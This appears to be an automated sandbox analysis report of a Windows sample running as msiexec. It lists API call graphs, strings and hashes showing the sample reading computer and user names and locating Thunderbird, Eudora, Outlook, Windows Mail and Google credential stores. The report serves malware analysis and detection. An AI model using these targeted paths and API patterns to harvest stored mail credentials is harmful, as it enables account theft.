12 API calls 33811->33935 33936 4038e8 21 API calls 33811->33936 33814 404785 FreeLibrary 33813->33814 33815 403a0b 33814->33815 33816 4037ca memset memset 33815->33816 33938 444551 memset 33816->33938 33819 4038e2 33819->33685 33878 40f334 333 API calls 33819->33878 33821 40382e 33822 406f06 2 API calls 33821->33822 33823 403843 33822->33823 33824 406f06 2 API calls 33823->33824 33825 403855 strchr 33824->33825 33826 403884 _mbscpy 33825->33826 33827 403897 strlen 33825->33827 33828 4038bf _mbscpy 33826->33828 33827->33828 33829 4038a4 sprintf 33827->33829 33947 4023e5 16 API calls 33828->33947 33829->33828 33833 40fb10 33831->33833 33832 403e7f 33841 40f96c 33832->33841 33833->33832 33834 40fb55 RegQueryValueExA 33833->33834 33834->33832 33835 40fb84 33834->33835 33836 404734 3 API calls 33835->33836 33837 40fb91 33836->33837 33837->33832 33838 40fc19 LocalFree 33837->33838 33839 40fbdd memcpy memcpy 33837->33839 33838->33832 33951 40f802 7 API calls 33839->33951 33842 4070ae GetVersionExA 33841->33842 33843 40f98d 33842->33843 33844 4045db 7 API calls 33843->33844 33852 40f9a9 33844->33852 33845 404656 FreeLibrary 33846 403e85 33845->33846 33853 4442ea memset 33846->33853 33847 40fae6 33847->33845 33848 40fa13 memset WideCharToMultiByte 33849 40fa43 _strnicmp 33848->33849 33848->33852 33850 40fa5b WideCharToMultiByte 33849->33850 33849->33852 33851 40fa88 WideCharToMultiByte 33850->33851 33850->33852 33851->33852 33852->33847 33852->33848 33854 410dbb 7 API calls 33853->33854 33855 444329 33854->33855 33952 40759e strlen strlen 33855->33952 33860 410dbb 7 API calls 33861 444350 33860->33861 33862 40759e 3 API calls 33861->33862 33863 44435a 33862->33863 33864 444212 64 API calls 33863->33864 33865 444366 memset memset 33864->33865 33866 410b1e RegQueryValueExA 33865->33866 33867 4443b9 ExpandEnvironmentStringsA strlen 33866->33867 33868 4443f4 _strcmpi 33867->33868 33869 4443e5 33867->33869 33870 403e91 33868->33870 33871 44440c 33868->33871 33869->33868 33870->33503 33872 444212 64 API calls 33871->33872 33872->33870 33873->33656 33874->33657 33875->33664 33876->33666 33877->33667 33878->33685 33879->33687 33880->33717 33881->33712 33883 40841c 33882->33883 33883->33724 33884->33728 33885->33728 33886->33728 33887->33728 33888->33738 33889->33738 33890->33738 33892 404656 FreeLibrary 33891->33892 33893 4045e3 LoadLibraryA 33892->33893 33894 404651 33893->33894 33895 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33893->33895 33894->33743 33894->33747 33896 40463d 33895->33896 33897 404643 33896->33897 33898 404656 FreeLibrary 33896->33898 33897->33894 33898->33894 33900 404666 33899->33900 33901 40465c FreeLibrary 33899->33901 33900->33654 33901->33900 33902->33753 33903->33760 33904->33763 33905->33760 33906->33760 33907->33782 33908->33782 33909->33782 33910->33788 33911->33790 33912->33791 33913->33795 33914->33796 33915->33796 33916->33805 33917->33802 33918->33811 33937 40466b _mbscpy 33919->33937 33921 40f6fa 33922 4045db 7 API calls 33921->33922 33923 40f708 33922->33923 33925 404734 3 API calls 33923->33925 33929 40f7e2 33923->33929 33924 404656 FreeLibrary 33926 40f7f1 33924->33926 33930 40f715 33925->33930 33927 404785 FreeLibrary 33926->33927 33928 40f7fc 33927->33928 33928->33811 33929->33924 33930->33929 33931 40f797 WideCharToMultiByte 33930->33931 33932 40f7b8 strlen 33931->33932 33933 40f7d9 LocalFree 33931->33933 33932->33933 33934 40f7c8 _mbscpy 33932->33934 33933->33929 33934->33933 33935->33811 33936->33811 33937->33921 33939 44458b 33938->33939 33940 40381a 33939->33940 33948 410add RegQueryValueExA 33939->33948 33940->33819 33946 4021b6 memset 33940->33946 33942 4445a4 33942->33940 33949 410add RegQueryValueExA 33942->33949 33944 4445c1 33944->33940 33950 444879 30 API calls 33944->33950 33946->33821 33947->33819 33948->33942 33949->33944 33950->33940 33951->33838 33953 4075c9 33952->33953 33954 4075bb _mbscat 33952->33954 33955 444212 33953->33955 33954->33953 33972 407e9d 33955->33972 33958 44424d 33959 444274 33958->33959 33960 444258 33958->33960 33980 407ef8 33958->33980 33961 407e9d 9 API calls 33959->33961 33997 444196 51 API calls 33960->33997 33968 4442a0 33961->33968 33963 407ef8 9 API calls 33963->33968 33964 4442ce 33994 407f90 33964->33994 33968->33963 33968->33964 33970 444212 64 API calls 33968->33970 33990 407e62 33968->33990 33969 407f90 FindClose 33971 4442e4 33969->33971 33970->33968 33971->33860 33973 407f90 FindClose 33972->33973 33974 407eaa 33973->33974 33975 406f06 2 API calls 33974->33975 33976 407ebd strlen strlen 33975->33976 33977 407ee1 33976->33977 33978 407eea 33976->33978 33998 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33998 33978->33958 33981 407f03 FindFirstFileA 33980->33981 33982 407f24 FindNextFileA 33980->33982 33983 407f3f 33981->33983 33984 407f46 strlen strlen 33982->33984 33985 407f3a 33982->33985 33983->33984 33989 407f7f 33983->33989 33986 407f76 33984->33986 33984->33989 33987 407f90 FindClose 33985->33987 33999 4070e3 strlen _mbscat _mbscpy _mbscat 33986->33999 33987->33983 33989->33958 33991 407e94 33990->33991 33992 407e6c strcmp 33990->33992 33991->33968 33992->33991 33993 407e83 strcmp 33992->33993 33993->33991 33995 407fa3 33994->33995 33996 407f99 FindClose 33994->33996 33995->33969 33996->33995 33997->33958 33998->33978 33999->33989 34000->33516 34001->33520 34002->33527 34003->33526 34004->33533 34005->33530 34006->33525 34024 411853 RtlInitializeCriticalSection memset 34025 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34201 40a256 13 API calls 34203 432e5b 17 API calls 34205 43fa5a 20 API calls 34027 401060 41 API calls 34208 427260 CloseHandle memset memset 34031 410c68 FindResourceA SizeofResource LoadResource LockResource 34210 405e69 14 API calls 34033 433068 15 API calls __fprintf_l 34212 414a6d 18 API calls 34213 43fe6f 134 API calls 34035 424c6d 15 API calls __fprintf_l 34214 426741 19 API calls 34037 440c70 17 API calls 34038 443c71 42 API calls 34041 427c79 24 API calls 34217 416e7e memset __fprintf_l 34045 42800b 47 API calls 34046 425115 85 API calls __fprintf_l 34220 41960c 61 API calls 34047 43f40c 122 API calls __fprintf_l 34050 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34051 43f81a 20 API calls 34053 414c20 memset memset 34054 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34224 414625 18 API calls 34225 404225 modf 34226 403a26 strlen WriteFile 34228 40422a 12 API calls 34232 427632 memset memset memcpy 34233 40ca30 59 API calls 34234 404235 26 API calls 34055 42ec34 61 API calls __fprintf_l 34056 425115 76 API calls __fprintf_l 34235 425115 77 API calls __fprintf_l 34237 44223a 38 API calls 34062 43183c 112 API calls 34238 44b2c5 _onexit __dllonexit 34243 42a6d2 memcpy __allrem 34064 405cda 60 API calls 34251 43fedc 138 API calls 34252 4116e1 16 API calls __fprintf_l 34067 4244e6 19 API calls 34069 42e8e8 127 API calls __fprintf_l 34070 4118ee RtlLeaveCriticalSection 34257 43f6ec 22 API calls 34072 425115 119 API calls __fprintf_l 34073 410cf3 EnumResourceNamesA 34260 4492f0 memcpy memcpy 34262 43fafa 18 API calls 34264 4342f9 15 API calls __fprintf_l 34074 4144fd 19 API calls 34266 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34267 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34270 443a84 _mbscpy 34272 43f681 17 API calls 34077 404487 22 API calls 34274 415e8c 16 API calls __fprintf_l 34081 411893 RtlDeleteCriticalSection __fprintf_l 34082 41a492 42 API calls 34278 403e96 34 API calls 34279 410e98 memset SHGetPathFromIDList SendMessageA 34084 426741 109 API calls __fprintf_l 34085 4344a2 18 API calls 34086 4094a2 10 API calls 34088 4108a4 7 API calls 34282 4116a6 15 API calls __fprintf_l 34283 43f6a4 17 API calls 34284 440aa3 20 API calls 34286 427430 45 API calls 34090 4090b0 7 API calls 34091 4148b0 15 API calls 34093 4118b4 RtlEnterCriticalSection 34094 4014b7 CreateWindowExA 34095 40c8b8 19 API calls 34097 4118bf RtlTryEnterCriticalSection 34291 42434a 18 API calls __fprintf_l 34293 405f53 12 API calls 34105 43f956 59 API calls 34107 40955a 17 API calls 34108 428561 36 API calls 34109 409164 7 API calls 34297 404366 19 API calls 34301 40176c ExitProcess 34304 410777 42 API calls 34114 40dd7b 51 API calls 34115 425d7c 16 API calls __fprintf_l 34306 43f6f0 25 API calls 34307 42db01 22 API calls 34116 412905 15 API calls __fprintf_l 34308 403b04 54 API calls 34309 405f04 SetDlgItemTextA GetDlgItemTextA 34310 44b301 ??3@YAXPAX 34313 4120ea 14 API calls 3 library calls 34314 40bb0a 8 API calls 34316 413f11 strcmp 34120 434110 17 API calls __fprintf_l 34123 425115 108 API calls __fprintf_l 34317 444b11 _onexit 34125 425115 76 API calls __fprintf_l 34128 429d19 10 API calls 34320 444b1f __dllonexit 34321 409f20 _strcmpi 34130 42b927 31 API calls 34324 433f26 19 API calls __fprintf_l 34325 44b323 FreeLibrary 34326 427f25 46 API calls 34327 43ff2b 17 API calls 34328 43fb30 19 API calls 34137 414d36 16 API calls 34139 40ad38 7 API calls 34330 433b38 16 API calls __fprintf_l 34007 44b33b 34008 44b344 ??3@YAXPAX 34007->34008 34009 44b34b 34007->34009 34008->34009 34010 44b354 ??3@YAXPAX 34009->34010 34011 44b35b 34009->34011 34010->34011 34012 44b364 ??3@YAXPAX 34011->34012 34013 44b36b 34011->34013 34012->34013 34014 44b374 ??3@YAXPAX 34013->34014 34015 44b37b 34013->34015 34014->34015 34143 426741 21 API calls 34144 40c5c3 123 API calls 34146 43fdc5 17 API calls 34331 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34149 4161cb memcpy memcpy memcpy memcpy 34336 43ffc8 18 API calls 34150 4281cc 15 API calls __fprintf_l 34338 4383cc 110 API calls __fprintf_l 34151 4275d3 41 API calls 34339 4153d3 22 API calls __fprintf_l 34152 444dd7 _XcptFilter 34344 4013de 15 API calls 34346 425115 111 API calls __fprintf_l 34347 43f7db 18 API calls 34350 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34154 4335ee 16 API calls __fprintf_l 34352 429fef 11 API calls 34155 444deb _exit _c_exit 34353 40bbf0 133 API calls 34158 425115 79 API calls __fprintf_l 34357 437ffa 22 API calls 34162 4021ff 14 API calls 34163 43f5fc 149 API calls 34358 40e381 9 API calls 34165 405983 40 API calls 34166 42b186 27 API calls __fprintf_l 34167 427d86 76 API calls 34168 403585 20 API calls 34170 42e58e 18 API calls __fprintf_l 34173 425115 75 API calls __fprintf_l 34175 401592 8 API calls 33213 410b92 33216 410a6b 33213->33216 33215 410bb2 33217 410a77 33216->33217 33218 410a89 GetPrivateProfileIntA 33216->33218 33221 410983 memset _itoa WritePrivateProfileStringA 33217->33221 33218->33215 33220 410a84 33220->33215 33221->33220 34362 434395 16 API calls 34177 441d9c memcmp 34364 43f79b 119 API calls 34178 40c599 42 API calls 34365 426741 87 API calls 34182 4401a6 21 API calls 34184 426da6 memcpy memset memset memcpy 34185 4335a5 15 API calls 34187 4299ab memset memset memcpy memset memset 34188 40b1ab 8 API calls 34370 425115 76 API calls __fprintf_l 34374 4113b2 18 API calls 2 library calls 34378 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33236 40765c 33233->33236 33234->33232 33235 4076a3 33235->33232 33236->33235 33239 40737c strtoul 33236->33239 33238->33231 33239->33236 34190 40b5bf memset memset _mbsicmp

                                                                                        Executed Functions

                                                                                        Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040832F
                                                                                        • memset.MSVCRT ref: 00408343
                                                                                        • memset.MSVCRT ref: 0040835F
                                                                                        • memset.MSVCRT ref: 00408376
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                        • strlen.MSVCRT ref: 004083E9
                                                                                        • strlen.MSVCRT ref: 004083F8
                                                                                        • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                        • String ID: 5$H$O$b$i$}$}
                                                                                        • API String ID: 1832431107-3760989150
                                                                                        • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                        • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                        • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                        • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                        Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 341 407f89-407f8f 338->341 342 407f83 339->342 343 407f76-407f81 call 4070e3 339->343 340->338 346 407f86-407f88 342->346 343->346 346->341
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                        • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                        • strlen.MSVCRT ref: 00407F5C
                                                                                        • strlen.MSVCRT ref: 00407F64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindstrlen$FirstNext
                                                                                        • String ID: ACD
                                                                                        • API String ID: 379999529-620537770
                                                                                        • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                        • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                        • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                        • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                        Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00401E8B
                                                                                        • strlen.MSVCRT ref: 00401EA4
                                                                                        • strlen.MSVCRT ref: 00401EB2
                                                                                        • strlen.MSVCRT ref: 00401EF8
                                                                                        • strlen.MSVCRT ref: 00401F06
                                                                                        • memset.MSVCRT ref: 00401FB1
                                                                                        • atoi.MSVCRT(?), ref: 00401FE0
                                                                                        • memset.MSVCRT ref: 00402003
                                                                                        • sprintf.MSVCRT ref: 00402030
                                                                                        • memset.MSVCRT ref: 00402086
                                                                                        • memset.MSVCRT ref: 0040209B
                                                                                        • strlen.MSVCRT ref: 004020A1
                                                                                        • strlen.MSVCRT ref: 004020AF
                                                                                        • strlen.MSVCRT ref: 004020E2
                                                                                        • strlen.MSVCRT ref: 004020F0
                                                                                        • memset.MSVCRT ref: 00402018
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                        • API String ID: 3833278029-4223776976
                                                                                        • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                        • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                        • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                        • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                        Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                          • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                          • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                          • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                        • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                        • API String ID: 745651260-375988210
                                                                                        • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                        • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                        • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                        • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                        Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                        Strings
                                                                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                        • PStoreCreateInstance, xrefs: 00403C44
                                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                        • pstorec.dll, xrefs: 00403C30
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                        • API String ID: 1197458902-317895162
                                                                                        • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                        • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                        • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                        • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                        Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                        • String ID:
                                                                                        • API String ID: 3662548030-0
                                                                                        • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                        • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                        • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                        • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                        Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044430B
                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                          • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                          • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                          • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                        • memset.MSVCRT ref: 00444379
                                                                                        • memset.MSVCRT ref: 00444394
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                        • strlen.MSVCRT ref: 004443DB
                                                                                        • _strcmpi.MSVCRT ref: 00444401
                                                                                        Strings
                                                                                        • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                        • Store Root, xrefs: 004443A5
                                                                                        • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                        • API String ID: 3203569119-2578778931
                                                                                        • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                        • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                        • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                        • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                        Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 2054149589-0
